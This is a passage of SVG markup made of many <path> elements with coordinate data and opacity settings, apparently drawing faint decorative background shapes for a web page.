d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 